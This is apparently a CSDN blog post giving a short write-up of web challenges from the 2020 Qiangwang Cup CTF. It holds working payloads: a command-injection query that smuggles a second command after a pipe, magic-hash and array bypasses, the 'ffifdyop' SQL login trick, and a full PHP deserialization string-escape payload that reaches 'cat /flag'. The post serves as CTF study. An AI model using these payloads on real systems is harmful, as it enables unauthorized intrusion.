强网杯web部分wp

最新推荐文章于 2023-12-22 22:31:10 发布
最新推荐文章于 2023-12-22 22:31:10 发布
阅读量493 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/108238179
版权

主动
?ip=127.0.0.1|cat ls 使用内联执行

在这里插入图片描述

Funhash
在这里插入图片描述

hash1=0e001233333333333334557778889可绕过
在这里插入图片描述

数组绕过
在这里插入图片描述

ffifdyop构成万能密钥
?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop
flag{y0u_w1ll_l1ke_h4sh}

web辅助

在这里插入图片描述

看到这个熟悉的替换,可以进行序列化字符逃逸
class.php里面的几个函数的利用方式 大概的就是$name()可触发__invoke(),然后stristr($this->name, ‘Yasuo’)可触发__toString()然后可以cat /flag。
然后算一下吞掉passwd字段要23位置,用十二个\0*\0,替换后可以吞掉24位,后面补一位即可。
使用16进制绕过check()
Payload:
username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=1";S:7:"\00*\00pass";O:7:“topsolo”:1:{S:7:"\00*\00\6E\61\6d\65";O:7:“midsolo”:1:{S:7:"\00*\00\6E\61\6d\65";O:6:“jungle”:2:{S:7:"\00*\00\6E\61\6d\65";s:0:"";}}};S:8:"\00*\00admin";i:1;}

flag{6c78e4f9-9d9c-46f7-81af-4aaf0ac31ae3}

upload
Wireshark打开,可以发现上传了一张图片,把图片提取出来,提示steghide,用steghide把文件提取出来密码123456

在这里插入图片描述

冰可乐不加可乐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2022第六届强网部分wp
mxx307的博客
08-01 2997
2022第六届强网部分wp
2022强网WP
CK_0ff的博客
08-08 2596
2022强网WP
2023年第七届强网部分WP
qq_65165505的博客
12-18 2629
在这个网站直接记载了2的27次方的阶乘的每一位数字之和对4495662081取个sha256即可。
2023年第七届强网杯初赛 WP
最新发布
渗透测试研究中心
12-22 1901
最坏情况下,前5次全输,需要87步即可达到260分,即第92轮时,因此可以通过本题。利用SQL注入修改data数据的值,本题data是数组,且会插入数据库,最终的payload需要改一下让前后闭合,且TP5,在网上找一个链子的EXP改一下。当然,前一题的SQL注入点依然存在,不过依然需要鉴权进入后台,这意味着,只需要我们能进入后台,就能通过load_file的方式读取flag。简单来说,就是能set任意的值,例如下方的payload,就能注入一个snowwolf的键,且值为wolf,4代表数据长度。
2021第五届强网部分writewp
zji
06-14 879
第五届强网部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
UNCTF2021 部分wp.pdf
12-10
unctf2021
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
2022强网web方向wp
xjh8023的博客
08-01 1440
考点文件泄露,、文件上传、文件包含、反序列化1.扫描目录存在www.zip,存在源码泄露2.代码审计,写一个inc文件内容为上传该文件,修改类型为image/jpeg2.进行反序列化,new一个类3.抓包将反序列化的值赋值给userfile,发包得到fla。...
攻防世界superspl[强网杯]WP
m0_73718199的博客
11-12 240
攻防世界superspl[强网杯]WP
2022强网杯pwn部分wp
N1rvana的博客
08-02 1468
2022强网杯pwn
2020强网部分wp
fly夏天的博客
08-26 1634
2020强网部分wp 彩笔参加了这次强网杯,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这题虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
[强网杯2022]WP-UM
Landasika的博客
08-02 568
考点WordPressUserMetaLitePro2.4.3Path遍历漏洞CVE-2022-0779。
强网wp
Sentiment的博客
07-22 999
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
【第六届强网杯CTF-Wp
qq_45603443的博客
08-02 2403
第六届强网杯全国网络安全挑战赛wp
强网杯2020部分WP
Sea_Sand息禅
08-24 2624
Funhash 有三个level,一个一个过 level1: hash函数之后的值等于原值,也就是使用hash进行md4加密之后的密文=明文,比较常见的有0e碰撞相等 给出两个加密之后开头仍是0e的字符串:0e251288019、0e001233333333333334557778889 hash1=0e001233333333333334557778889绕过level1 level2 数组绕过:hash2[]=1&hash3[]=3 level3 特殊字符绕过:hash4=ffifdyop
2020第四届强网杯-强网先锋-Web辅助 writeup
lnjoy
09-13 1635
2020第四届强网杯,强网先锋的Web辅助详解。 本题考查php反序列化,反序列化字符串逃逸,__wakeup()绕过,使用16进制绕过关键字过滤。 题目给了源码,要求传入get参数username和password。 由源码可知,在index.php传入username和password后,会使用这两个参数创建player对象。将player对象序列化,经过write函数处理,最后写入以访问ip的md5为文件名的文件中。 if (isset($_GET['username']) && is
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要注意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了网络安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值